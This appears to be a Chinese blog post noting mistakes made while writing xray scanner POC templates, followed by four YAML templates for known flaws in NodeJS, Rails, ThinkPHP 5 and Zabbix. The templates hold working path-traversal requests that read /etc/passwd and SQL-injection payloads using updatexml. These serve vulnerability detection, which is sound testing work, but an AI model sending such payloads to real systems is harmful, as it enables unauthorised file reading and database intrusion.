xray写POC踩坑
2024-08-26 17:51:14
错误记录
静态文件目录不一定是static。
只考虑了linux的情况,如果是 windows 呢,能读取某些应用自己的源码吗。
实际环境参数不一定是id,thinkphp 不适合使用 poc 来写
poc 内容没啥问题,文件名和 poc name有问题 https://travis-ci.org/chaitin/xray/builds/583451463?utm_source=github_status&utm_medium=notification
NodeJS_path-validation_CVE-2017-14849.yml
name: NodeJS_path-validation_CVE-2017-14849
rules:
- method: GET
path: /static/../../../a/../../../../etc/passwd
headers:
Accept: ''
follow_redirects: false
expression: |
status==200 && body.bcontains(b'root:x:0:0')
detail:
author: 17bdw
Affected Version: "NodeJS 8.5.0"
links:
- https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849
Rails_file_content_disclosure_CVE-2019-5418
name: Rails_file_content_disclosure_CVE-2019-5418
rules:
- method: GET
path: /robots
headers:
Accept: '../../../../../../../../etc/passwd{{'
follow_redirects: false
expression: |
status==200 && body.bcontains(b'root:x:0:0')
detail:
author: 17bdw
Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1"
links:
- https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418
thinkphp5-in-sqlinjection
name: thinkphp5-in-sqlinjection
rules:
- method: GET
path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
expression: |
body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
author: 17bdw
Affected Version: "thinkphp5-in-sqlinjection"
vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
links:
- https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection
zabbix_3.0.3_jsrpc.php_CVE-2016-10134
name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134
rules:
- method: GET
path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0)
expression: |
body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
author: 17bdw
Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134"
vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)"
links:
- https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
最新文章
- XMLHttpRequest对象用法
- [C/C++基础] C语言常用函数memset的使用方法
- !! Scrum之 流程和术语
- Qt事件循环与状态机事件循环的思考
- SWMM代码移植到64位平台
- 阵列卡,组成的磁盘组就像是一个硬盘,pci-e扩展出sata3.0
- 开发框架CIIP
- input标签的hidden属性的应用及作用
- 使用jQuery快速高效制作网页特效-----------------------------之jQuery事件与动画
- clipboardjs复制到粘贴板
- 【C++ 流类库与输入输出 】实验七
- include 模板标签
- js保存,获取,删除cookie的操作
- margin-left:10px; 不同浏览器距离为什么不一样?
- Android图片加载框架最全解析(四),玩转Glide的回调与监听
- CodeIgniter(3.1.4)框架中添加执行时间统计代码
- 816D.Karen and Test 杨辉三角 规律 组合
- Python 列表 min() 方法
- 微信小程序-表格形式如何布局?
- 用sql语句,快速备份表数据